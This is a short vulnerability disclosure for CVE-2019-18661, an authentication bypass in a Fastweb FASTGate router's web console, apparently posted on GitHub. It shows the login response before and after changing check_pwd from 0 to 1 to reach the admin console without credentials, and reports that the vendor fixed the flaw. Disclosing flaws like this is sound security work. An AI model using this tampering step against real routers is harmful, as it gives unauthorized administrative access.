Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

CVE-2019-18661

Fastweb FASTGate Router

Software version: 1.0.1b

WEB Authentication Bypass:

It's possible to bypass the authentication login in order to access to the router's web administration console not knowing the user credentials. After attempting to sign in with random credentials an error message is usually returned and the access to the web console is denied. It's possible to bypass that logical control by modifying the check_pwd return value from 0 to 1 in the server's response.

Regular Response with random credentials:

HTTP/1.1 200 OK
Server: nginx
Date: Wed, DD MM 2019 22:18:45 GMT
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
CONTENT-LANGUAGE: en
Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline'
Content-Length: 96

{
  "login_confirm":{
    "login_confirm":"end",
    "check_user":"1",
    "check_pwd":"0"
  }
}

Modified Response after using random credentials:

HTTP/1.1 200 OK
Server: nginx
Date: Wed, DD MM 2019 22:18:45 GMT
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
CONTENT-LANGUAGE: en
Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' 'unsafe-inline';style-src 'self' 'unsafe-inline'
Content-Length: 96

{
  "login_confirm":{
    "login_confirm":"end",
    "check_user":"1",
    "check_pwd":"1"
  }
}

There is not a configuration disclosure but the web console is fully navigable and it is possible to provide an attacker visibility of all web pages and features of the administration console. The user appears really authenticated, as shown by the presence of the logout button. An unauthorized user should not have the possibility to access and see the administrative features and any unauthorized request should be redirect to the default login page.

The vulnerability was reported to the fastweb team that promptly proceeded to fix it.

Reference

link CVE